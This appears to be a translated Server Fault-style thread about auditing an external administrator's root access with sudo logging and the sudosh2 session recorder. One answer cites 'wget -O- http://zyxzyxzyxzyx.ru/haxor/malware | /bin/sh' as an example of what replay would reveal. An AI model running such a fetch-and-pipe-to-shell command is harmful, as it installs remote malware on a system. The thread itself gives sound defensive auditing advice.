我想将我的根服务器的访问权限授予外部系统管理员,但我想确保仔细检查他对我的服务器所做的事情,例如复制我不希望他们做的数据等等。我还想跟踪访问的任何文件,即使是只读且未编辑的文件。
我怎样才能做到这一点?
EEA*_*EAA 22
不要给他root权限。相反,给他一个非特权用户帐户并请求他通过 完成他的所有工作sudo,这将记录他的所有命令。
请记住,如果此人有恶意,并且您授予他完全的 sudo 权限,他将找到一种方法来执行这些恶意,而不会记录这些命令。在这种情况下,只授予他访问他完成工作所需的特定命令的权限。
Ste*_*ski 21
信任但要验证!
查看sudosh2。sudosh2 由 FreeBSD 端口提供。软件包可用于 RedHat 和 Ubuntu。这是他们网站上的描述:
sudosh 是一个审计外壳过滤器,可以用作登录外壳。Sudosh 记录所有击键和输出,并且可以像 VCR 一样回放会话。
Sudosh 将允许您重放用户的会话,这将允许您查看用户看到的所有输入和输出。您可以看到所有内容,击键、拼写错误、退格、他们在 中编辑的内容vi、输出wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh等。
可以将 sudosh 日志发送到 syslog,以便它们可以存储在远离系统的中央 syslog 服务器上。
请注意,sudosh2 是 sudosh 的替代品,后者已被其作者放弃
您是否在用户坚持拥有超级用户特权的学术机构工作?或者您是否在公司工作并希望允许用户在自己的 VM 上拥有超级用户权限?这可能是您的解决方案。
| 归档时间: |
|
| 查看次数: |
2979 次 |
| 最近记录: |